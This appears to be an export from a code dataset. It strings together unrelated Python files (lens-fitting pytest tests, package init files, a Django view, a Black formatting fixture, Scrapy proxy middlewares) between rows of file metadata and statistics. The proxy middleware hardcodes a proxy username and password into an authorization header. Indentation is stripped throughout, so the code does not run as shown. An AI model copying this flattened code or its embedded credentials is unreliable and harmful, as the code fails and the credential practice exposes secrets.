chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_hyper_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(mask=lens_data_hyper_manual.mask,
noise_map=lens_data_hyper_manual.noise_map)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.figure_of_merit, 1e-4)
assert likelihood == pytest.approx(fit.figure_of_merit, 1e-4)
blurred_image_of_planes = util.blurred_image_of_planes_from_1d_images_and_convolver(
total_planes=tracer.total_planes, image_plane_image_1d_of_planes=tracer.image_plane_image_1d_of_planes,
image_plane_blurring_image_1d_of_planes=tracer.image_plane_blurring_image_1d_of_planes,
convolver=lens_data_hyper_manual.convolver_image,
map_to_scaled_array=lens_data_hyper_manual.map_to_scaled_array)
assert (blurred_image_of_planes[0] == fit.model_image_of_planes[0]).all()
assert (blurred_image_of_planes[1] == fit.model_image_of_planes[1]).all()
unmasked_blurred_image = \
util.unmasked_blurred_image_from_padded_grid_stack_psf_and_unmasked_image(
padded_grid_stack=lens_data_hyper_manual.padded_grid_stack, psf=lens_data_hyper_manual.psf,
unmasked_image_1d=padded_tracer.image_plane_image_1d)
assert (unmasked_blurred_image == fit.unmasked_model_image).all()
unmasked_blurred_image_of_planes = \
util.unmasked_blurred_image_of_planes_from_padded_grid_stack_and_psf(
planes=padded_tracer.planes, padded_grid_stack=lens_data_hyper_manual.padded_grid_stack,
psf=lens_data_hyper_manual.psf)
assert (unmasked_blurred_image_of_planes[0] == fit.unmasked_model_image_of_planes[0]).all()
assert (unmasked_blurred_image_of_planes[1] == fit.unmasked_model_image_of_planes[1]).all()
unmasked_blurred_image_of_galaxies = \
util.unmasked_blurred_image_of_planes_and_galaxies_from_padded_grid_stack_and_psf(
planes=padded_tracer.planes, padded_grid_stack=lens_data_hyper_manual.padded_grid_stack,
psf=lens_data_hyper_manual.psf)
assert (unmasked_blurred_image_of_galaxies[0][0] == fit.unmasked_model_image_of_planes_and_galaxies[0][0]).all()
assert (unmasked_blurred_image_of_galaxies[1][0] == fit.unmasked_model_image_of_planes_and_galaxies[1][0]).all()
class TestLensInversionHyperFit:
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_hyper_manual):
pix = pixelizations.Rectangular(shape=(3, 3))
mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_hyper_manual.grid_stack,
border=lens_data_hyper_manual.border)
reg = regularization.Constant(coefficients=(1.0,))
hyper_galaxy = g.HyperGalaxy(contribution_factor=4.0, noise_factor=2.0, noise_power=3.0)
hyp_galaxy = g.Galaxy(hyper_galaxy=hyper_galaxy)
inv_galaxy = g.Galaxy(pixelization=pix, regularization=reg)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[hyp_galaxy, hyp_galaxy],
source_galaxies=[inv_galaxy],
image_plane_grid_stack=lens_data_hyper_manual.grid_stack,
border=None)
fit = lens_fit.hyper_fit_lens_data_with_tracer(lens_data_hyper=lens_data_hyper_manual, tracer=tracer)
contributions_1d = util.contribution_maps_1d_from_hyper_images_and_galaxies(
hyper_model_image_1d=lens_data_hyper_manual.hyper_model_image_1d,
hyper_galaxy_images_1d=lens_data_hyper_manual.hyper_galaxy_images_1d,
hyper_galaxies=tracer.hyper_galaxies, hyper_minimum_values=lens_data_hyper_manual.hyper_minimum_values)
contribution_maps = list(map(lambda contribution_1d:
lens_data_hyper_manual.map_to_scaled_array(array_1d=contribution_1d),
contributions_1d))
assert contribution_maps[0] == pytest.approx(fit.contribution_maps[0], 1.0e-4)
hyper_noise_map_1d = util.scaled_noise_map_from_hyper_galaxies_and_contribution_maps(
contribution_maps=contributions_1d, hyper_galaxies=tracer.hyper_galaxies,
noise_map=lens_data_hyper_manual.noise_map_1d)
hyper_noise_map = lens_data_hyper_manual.map_to_scaled_array(array_1d=hyper_noise_map_1d)
assert hyper_noise_map == pytest.approx(fit.noise_map, 1.0e-4)
inversion = inversions.inversion_from_image_mapper_and_regularization(mapper=mapper,
regularization=reg, image_1d=lens_data_hyper_manual.image_1d, noise_map_1d=hyper_noise_map_1d,
convolver=lens_data_hyper_manual.convolver_mapping_matrix)
assert inversion.reconstructed_data == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_hyper_manual.image,
mask=lens_data_hyper_manual.mask, model_data=inversion.reconstructed_data)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_hyper_manual.mask, noise_map=hyper_noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_hyper_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(mask=lens_data_hyper_manual.mask,
noise_map=hyper_noise_map)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.likelihood, 1e-4)
likelihood_with_regularization = \
util.likelihood_with_regularization_from_chi_squared_regularization_term_and_noise_normalization(
chi_squared=chi_squared, regularization_term=inversion.regularization_term,
noise_normalization=noise_normalization)
assert likelihood_with_regularization == pytest.approx(fit.likelihood_with_regularization, 1e-4)
evidence = util.evidence_from_inversion_terms(chi_squared=chi_squared,
regularization_term=inversion.regularization_term,
log_curvature_regularization_term=inversion.log_det_curvature_reg_matrix_term,
log_regularization_term=inversion.log_det_regularization_matrix_term, noise_normalization=noise_normalization)
assert evidence == fit.evidence
assert evidence == fit.figure_of_merit
class TestLensProfileInversionHyperFit:
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_hyper_manual):
pix = pixelizations.Rectangular(shape=(3, 3))
mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_hyper_manual.grid_stack,
border=lens_data_hyper_manual.border)
reg = regularization.Constant(coefficients=(1.0,))
hyper_galaxy = g.HyperGalaxy(contribution_factor=4.0, noise_factor=2.0, noise_power=3.0)
hyp_galaxy = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0), hyper_galaxy=hyper_galaxy)
inv_galaxy = g.Galaxy(pixelization=pix, regularization=reg)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[hyp_galaxy, hyp_galaxy],
source_galaxies=[inv_galaxy],
image_plane_grid_stack=lens_data_hyper_manual.grid_stack,
border=None)
fit = lens_fit.hyper_fit_lens_data_with_tracer(lens_data_hyper=lens_data_hyper_manual, tracer=tracer)
contributions_1d = util.contribution_maps_1d_from_hyper_images_and_galaxies(
hyper_model_image_1d=lens_data_hyper_manual.hyper_model_image_1d,
hyper_galaxy_images_1d=lens_data_hyper_manual.hyper_galaxy_images_1d,
hyper_galaxies=tracer.hyper_galaxies, hyper_minimum_values=lens_data_hyper_manual.hyper_minimum_values)
contribution_maps = list(map(lambda contribution_1d:
lens_data_hyper_manual.map_to_scaled_array(array_1d=contribution_1d),
contributions_1d))
assert contribution_maps[0] == pytest.approx(fit.contribution_maps[0], 1.0e-4)
hyper_noise_map_1d = util.scaled_noise_map_from_hyper_galaxies_and_contribution_maps(
contribution_maps=contributions_1d, hyper_galaxies=tracer.hyper_galaxies,
noise_map=lens_data_hyper_manual.noise_map_1d)
hyper_noise_map = lens_data_hyper_manual.map_to_scaled_array(array_1d=hyper_noise_map_1d)
assert hyper_noise_map == pytest.approx(fit.noise_map, 1.0e-4)
blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_hyper_manual.convolver_image)
blurred_profile_image = lens_data_hyper_manual.map_to_scaled_array(array_1d=blurred_profile_image_1d)
assert blurred_profile_image == pytest.approx(fit.blurred_profile_image, 1e-4)
profile_subtracted_image = lens_data_hyper_manual.image - blurred_profile_image
assert profile_subtracted_image == pytest.approx(fit.profile_subtracted_image)
blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_hyper_manual.convolver_image)
profile_subtracted_image_1d = lens_data_hyper_manual.image_1d - blurred_profile_image_1d
inversion = inversions.inversion_from_image_mapper_and_regularization(
image_1d=profile_subtracted_image_1d, noise_map_1d=hyper_noise_map_1d,
convolver=lens_data_hyper_manual.convolver_mapping_matrix, mapper=mapper, regularization=reg)
model_image = blurred_profile_image + inversion.reconstructed_data
assert model_image == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_hyper_manual.image,
mask=lens_data_hyper_manual.mask,
model_data=model_image)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_hyper_manual.mask, noise_map=hyper_noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_hyper_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(noise_map=hyper_noise_map,
mask=lens_data_hyper_manual.mask)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.likelihood, 1e-4)
likelihood_with_regularization = \
util.likelihood_with_regularization_from_chi_squared_regularization_term_and_noise_normalization(
chi_squared=chi_squared, regularization_term=inversion.regularization_term,
noise_normalization=noise_normalization)
assert likelihood_with_regularization == pytest.approx(fit.likelihood_with_regularization, 1e-4)
evidence = util.evidence_from_inversion_terms(chi_squared=chi_squared,
regularization_term=inversion.regularization_term,
log_curvature_regularization_term=inversion.log_det_curvature_reg_matrix_term,
log_regularization_term=inversion.log_det_regularization_matrix_term,
noise_normalization=noise_normalization)
assert evidence == fit.evidence
assert evidence == fit.figure_of_merit
class MockTracerPositions:
def __init__(self, positions, noise=None):
self.positions = positions
self.noise = noise
class TestPositionFit:
def test__x1_positions__mock_position_tracer__maximum_separation_is_correct(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == 1.0
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [1.0, 1.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(2)
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [1.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(1.0) + np.square(3.0))
tracer = MockTracerPositions(positions=[np.array([[-2.0, -4.0], [1.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(3.0) + np.square(7.0))
tracer = MockTracerPositions(positions=[np.array([[8.0, 4.0], [-9.0, -4.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(17.0) + np.square(8.0))
def test_multiple_positions__mock_position_tracer__maximum_separation_is_correct(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0], [0.0, 0.5]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == 1.0
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 0.0], [3.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(18)
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [1.0, 1.0], [3.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(18)
tracer = MockTracerPositions(positions=[np.array([[-2.0, -4.0], [1.0, 3.0], [0.1, 0.1], [-0.1, -0.1],
[0.3, 0.4], [-0.6, 0.5]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(3.0) + np.square(7.0))
tracer = MockTracerPositions(positions=[np.array([[8.0, 4.0], [8.0, 4.0], [-9.0, -4.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == np.sqrt(np.square(17.0) + np.square(8.0))
def test_multiple_sets_of_positions__multiple_sets_of_max_distances(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0], [0.0, 0.5]]),
np.array([[0.0, 0.0], [0.0, 0.0], [3.0, 3.0]]),
np.array([[0.0, 0.0], [1.0, 1.0], [3.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separations[0] == 1.0
assert fit.maximum_separations[1] == np.sqrt(18)
assert fit.maximum_separations[2] == np.sqrt(18)
def test__likelihood__is_sum_of_separations_divided_by_noise(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0], [0.0, 0.5]]),
np.array([[0.0, 0.0], [0.0, 0.0], [3.0, 3.0]]),
np.array([[0.0, 0.0], [1.0, 1.0], [3.0, 3.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.chi_squared_map[0] == 1.0
assert fit.chi_squared_map[1] == pytest.approx(18.0, 1e-4)
assert fit.chi_squared_map[2] == pytest.approx(18.0, 1e-4)
assert fit.figure_of_merit == pytest.approx(-0.5 * (1.0 + 18 + 18), 1e-4)
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=2.0)
assert fit.chi_squared_map[0] == (1.0 / 2.0) ** 2.0
assert fit.chi_squared_map[1] == pytest.approx((np.sqrt(18.0) / 2.0) ** 2.0, 1e-4)
assert fit.chi_squared_map[2] == pytest.approx((np.sqrt(18.0) / 2.0) ** 2.0, 1e-4)
assert fit.figure_of_merit == pytest.approx(-0.5 * ((1.0 / 2.0) ** 2.0 + (np.sqrt(18.0) / 2.0) ** 2.0 +
(np.sqrt(18.0) / 2.0) ** 2.0), 1e-4)
def test__threshold__if_not_met_returns_ray_tracing_exception(self):
tracer = MockTracerPositions(positions=[np.array([[0.0, 0.0], [0.0, 1.0]])])
fit = lens_fit.LensPositionFit(positions=tracer.positions, noise_map=1.0)
assert fit.maximum_separation_within_threshold(threshold=100.0) == True
assert fit.maximum_separation_within_threshold(threshold=0.1) == False
| 58.413913
| 176
| 0.623333
| 8,255
| 67,176
| 4.663356
| 0.029558
| 0.018184
| 0.021743
| 0.023379
| 0.934305
| 0.921083
| 0.915939
| 0.903263
| 0.891729
| 0.881546
| 0
| 0.033905
| 0.291801
| 67,176
| 1,149
| 177
| 58.464752
| 0.775276
| 0.00195
| 0
| 0.71374
| 0
| 0
| 0.001193
| 0.000671
| 0
| 0
| 0
| 0
| 0.164122
| 1
| 0.044529
| false
| 0.001272
| 0.022901
| 0
| 0.109415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2dc3e2a5293a5a3cd4c1eec32f3413798961851d
| 210
|
py
|
Python
|
keyboards/inline/__init__.py
|
Bainky/Ventify
|
638486dc5f265a4907a5a193ea2a7c9b44e8e943
|
[
"MIT"
] | 6
|
2021-03-11T11:43:17.000Z
|
2021-12-08T05:26:20.000Z
|
keyboards/inline/__init__.py
|
Bainky/Ventify
|
638486dc5f265a4907a5a193ea2a7c9b44e8e943
|
[
"MIT"
] | null | null | null |
keyboards/inline/__init__.py
|
Bainky/Ventify
|
638486dc5f265a4907a5a193ea2a7c9b44e8e943
|
[
"MIT"
] | 2
|
2021-03-24T05:31:12.000Z
|
2021-04-13T22:03:11.000Z
|
from .subcategories_menu import *
from .management_buttons import *
from .animals_categories import *
from .anime_categories import *
from logging import warning
warning("Imported: [keyboards/inline]")
| 26.25
| 39
| 0.780952
| 24
| 210
| 6.666667
| 0.583333
| 0.25
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 210
| 8
| 39
| 26.25
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.137255
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
930c45412f500e803aca50e0e508f0db91921be2
| 230
|
py
|
Python
|
MuzzicApp/views.py
|
vibu267/muzzic
|
ca2c905c578ebb8c710fc673fe34071962967abf
|
[
"Apache-2.0"
] | null | null | null |
MuzzicApp/views.py
|
vibu267/muzzic
|
ca2c905c578ebb8c710fc673fe34071962967abf
|
[
"Apache-2.0"
] | null | null | null |
MuzzicApp/views.py
|
vibu267/muzzic
|
ca2c905c578ebb8c710fc673fe34071962967abf
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
def index(request):
return render_to_response('index.html')
| 25.555556
| 47
| 0.834783
| 31
| 230
| 6.064516
| 0.516129
| 0.212766
| 0.202128
| 0.265957
| 0.329787
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113043
| 230
| 8
| 48
| 28.75
| 0.921569
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.666667
| 0.166667
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
935f3e2d7a1b42b0112d6d3954b4b88737ef1742
| 1,132
|
py
|
Python
|
tests/data/comments_non_breaking_space.py
|
Pierre-Sassoulas/black
|
b09e024deefc61601983d3c5c7de1905de569480
|
[
"MIT"
] | null | null | null |
tests/data/comments_non_breaking_space.py
|
Pierre-Sassoulas/black
|
b09e024deefc61601983d3c5c7de1905de569480
|
[
"MIT"
] | null | null | null |
tests/data/comments_non_breaking_space.py
|
Pierre-Sassoulas/black
|
b09e024deefc61601983d3c5c7de1905de569480
|
[
"MIT"
] | null | null | null |
from .config import ( ConfigTypeAttributes, Int, Path, # String,
# DEFAULT_TYPE_ATTRIBUTES,
)
result = 1 # A simple comment with a NBSP
result = ( 1, ) # Another NBSP
result = 1 # type: ignore
result = 1# This comment is talking about type: ignore and start with NBSP
square = Square(4) # type: Optional[Square]
def function(a:int=42):
""" This docstring start with a NBSP
There is one NBSP column 5 here
This is 7 NBSP
"""
# There's a NBSP + 3 spaces before
# And 4 spaces on the next line
pass
# output
from .config import (
ConfigTypeAttributes,
Int,
Path, # String,
# DEFAULT_TYPE_ATTRIBUTES,
)
result = 1 # A simple comment with a NBSP
result = (1,) # Another NBSP
result = 1 # type: ignore
result = 1 # This comment is talking about type: ignore and start with NBSP
square = Square(4) # type: Optional[Square]
def function(a: int = 42):
"""This docstring start with a NBSP
There is one NBSP column 5 here
This is 7 NBSP
"""
# There's a NBSP + 3 spaces before
# And 4 spaces on the next line
pass
| 24.085106
| 76
| 0.636042
| 165
| 1,132
| 4.339394
| 0.290909
| 0.078212
| 0.050279
| 0.100559
| 0.99162
| 0.99162
| 0.99162
| 0.99162
| 0.99162
| 0.99162
| 0
| 0.027127
| 0.283569
| 1,132
| 46
| 77
| 24.608696
| 0.855734
| 0.579505
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0.095238
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
fa7bb0f17632affcba803e7520acb9e06530ad3d
| 45
|
py
|
Python
|
opus/apps/__init__.py
|
Brychlikov/OPUS
|
380c0268cc77a2eac91ae7dd0f75f52444e7c665
|
[
"MIT"
] | null | null | null |
opus/apps/__init__.py
|
Brychlikov/OPUS
|
380c0268cc77a2eac91ae7dd0f75f52444e7c665
|
[
"MIT"
] | null | null | null |
opus/apps/__init__.py
|
Brychlikov/OPUS
|
380c0268cc77a2eac91ae7dd0f75f52444e7c665
|
[
"MIT"
] | 2
|
2020-07-13T12:50:31.000Z
|
2020-07-16T17:36:01.000Z
|
from . import prettyfier
from . import check
| 15
| 24
| 0.777778
| 6
| 45
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 25
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fa929ace6b1ea99f9feddbc4a254c1a3f64840aa
| 243
|
py
|
Python
|
qtensor/simplify_circuit/__init__.py
|
marwahaha/QTensor
|
936d078825a6418f9d32d2c176332422d8a4c137
|
[
"BSD-3-Clause"
] | 20
|
2020-09-08T20:32:44.000Z
|
2022-03-18T11:27:57.000Z
|
qtensor/simplify_circuit/__init__.py
|
marwahaha/QTensor
|
936d078825a6418f9d32d2c176332422d8a4c137
|
[
"BSD-3-Clause"
] | 21
|
2020-10-09T04:44:48.000Z
|
2021-10-05T03:32:35.000Z
|
qtensor/simplify_circuit/__init__.py
|
marwahaha/QTensor
|
936d078825a6418f9d32d2c176332422d8a4c137
|
[
"BSD-3-Clause"
] | 4
|
2020-12-18T01:37:10.000Z
|
2021-07-26T21:24:20.000Z
|
from .simplify_circuit import simplify_circuit
from . import gates
from .simplify_circuit_api import simplify_qtree_circuit
from .simplify_circuit_api import get_simplifiable_circuit_composer
from .simplify_circuit_api import SimpQAOAComposer
| 40.5
| 67
| 0.897119
| 32
| 243
| 6.40625
| 0.34375
| 0.365854
| 0.370732
| 0.321951
| 0.409756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082305
| 243
| 5
| 68
| 48.6
| 0.919283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
87891703f2f56f13d9ae19cb72cf6918d3ecfb8c
| 204
|
py
|
Python
|
usfgan/layers/__init__.py
|
chomeyama/UnifiedSourceFilterGAN
|
ffb111a1b5f30d40b7170656c451640ca5abb514
|
[
"MIT"
] | 13
|
2021-04-07T04:26:16.000Z
|
2021-09-06T02:17:02.000Z
|
usfgan/layers/__init__.py
|
chomeyama/UnifiedSourceFilterGAN
|
ffb111a1b5f30d40b7170656c451640ca5abb514
|
[
"MIT"
] | null | null | null |
usfgan/layers/__init__.py
|
chomeyama/UnifiedSourceFilterGAN
|
ffb111a1b5f30d40b7170656c451640ca5abb514
|
[
"MIT"
] | 1
|
2021-04-22T22:38:02.000Z
|
2021-04-22T22:38:02.000Z
|
from usfgan.layers.residual_block import * # NOQA
from usfgan.layers.upsample import * # NOQA
from usfgan.layers.source_network import * # NOQA
from usfgan.layers.filter_network import * # NOQA
| 40.8
| 50
| 0.754902
| 27
| 204
| 5.592593
| 0.407407
| 0.264901
| 0.423841
| 0.397351
| 0.516556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 204
| 4
| 51
| 51
| 0.888235
| 0.093137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
87a25226bd0762b51dbc6f4dc4e2e63e3990cb46
| 7,537
|
py
|
Python
|
gorden_crawler/middlewares/proxy_ats.py
|
Enmming/gorden_cralwer
|
3c279e4f80eaf90f3f03acd31b75cf991952adee
|
[
"Apache-2.0"
] | 2
|
2019-02-22T13:51:08.000Z
|
2020-08-03T14:01:30.000Z
|
gorden_crawler/middlewares/proxy_ats.py
|
Enmming/gorden_cralwer
|
3c279e4f80eaf90f3f03acd31b75cf991952adee
|
[
"Apache-2.0"
] | null | null | null |
gorden_crawler/middlewares/proxy_ats.py
|
Enmming/gorden_cralwer
|
3c279e4f80eaf90f3f03acd31b75cf991952adee
|
[
"Apache-2.0"
] | 1
|
2020-08-03T14:01:32.000Z
|
2020-08-03T14:01:32.000Z
|
import base64
import re
import datetime
import random
import os
class AsiaOpenProxyRandomMiddleware(object):
def process_request(self, request, spider):
proxy_ips = [
'https://sg.proxymesh.com:31280',
'https://jp.proxymesh.com:31280',
]
randint = random.randint(0, len(proxy_ips) - 1)
randip = proxy_ips[randint]
request.meta['proxy'] = randip
class OpenProxyRandomMiddleware(object):
def process_request(self, request, spider):
proxy_ips = [
'https://us-dc.proxymesh.com:31280',
# 'https://us-fl.proxymesh.com:31280',
# 'https://de.proxymesh.com:31280',
# 'https://nl.proxymesh.com:31280',
# 'https://sg.proxymesh.com:31280',
# 'https://jp.proxymesh.com:31280',
# 'https://ch.proxymesh.com:31280',
'https://us-ca.proxymesh.com:31280',
'https://us-ny.proxymesh.com:31280',
'https://us-il.proxymesh.com:31280',
# 'https://uk.proxymesh.com:31280',
]
# if os.environ['yelp_country'] == 'hk' or os.environ['yelp_country'] == 'tw' or os.environ['yelp_country'] == 'sg':
# proxy_ips = [
# 'https://sg.proxymesh.com:31280',
# 'https://jp.proxymesh.com:31280',
# ]
# elif os.environ['yelp_country'] == 'uk' or os.environ['yelp_country'] == 'de' or os.environ['yelp_country'] == 'nl':
# proxy_ips = [
# 'https://uk.proxymesh.com:31280',
# ]
# elif os.environ['yelp_country'] == 'usa':
# proxy_ips = [
# # 'https://us-dc.proxymesh.com:31280',
# # 'https://us-fl.proxymesh.com:31280',
# 'https://us-ca.proxymesh.com:31280',
# # 'https://us-ny.proxymesh.com:31280',
# # 'https://us-il.proxymesh.com:31280',
# ]
randint = random.randint(0, len(proxy_ips) - 1)
randip = proxy_ips[randint]
request.meta['proxy'] = randip
# print 'ip: ' + randip
# "https://us-il.proxymesh.com:31280"
# request.meta['proxy'] = "http://45.63.58.8:8080"
# proxy_user_pass = "root:wniiroacp!7"
# proxy_user_pass = "reeves:11111111"
# encoded_user_pass = base64.encodestring(proxy_user_pass)
# request.headers['Proxy-Authorization'] = 'Basic ' + encoded_user_pass
class OpenProxyMiddleware(object):
def process_request(self, request, spider):
request.meta['proxy'] = "https://us-ny.proxymesh.com:31280" # "http://45.63.58.8:8080"
# request.meta['proxy'] = "http://45.63.58.8:8080"
# proxy_user_pass = "root:wniiroacp!7"
proxy_user_pass = "reeves:11111111"
encoded_user_pass = base64.encodestring(proxy_user_pass)
request.headers['Proxy-Authorization'] = 'Basic ' + encoded_user_pass
class ProxyMiddleware(object):
def process_request(self, request, spider):
url = request.url
today = datetime.date.today()
today_day = int(today.strftime("%d"))
# if not re.match(r"^https", url):
today_proxy = today_day % 3
if today_proxy == 0:
request.meta['proxy'] = "https://us.proxymesh.com:31280" # "http://45.63.58.8:8080"
elif today_proxy == 1:
request.meta['proxy'] = "https://us-dc.proxymesh.com:31280" # "http://45.63.58.8:8080"
else:
request.meta['proxy'] = "https://us-il.proxymesh.com:31280" # "http://45.63.58.8:8080"
# request.meta['proxy'] = "http://45.63.58.8:8080"
# proxy_user_pass = "root:wniiroacp!7"
proxy_user_pass = "reeves:11111111"
encoded_user_pass = base64.encodestring(proxy_user_pass)
request.headers['Proxy-Authorization'] = 'Basic ' + encoded_user_pass
# else:
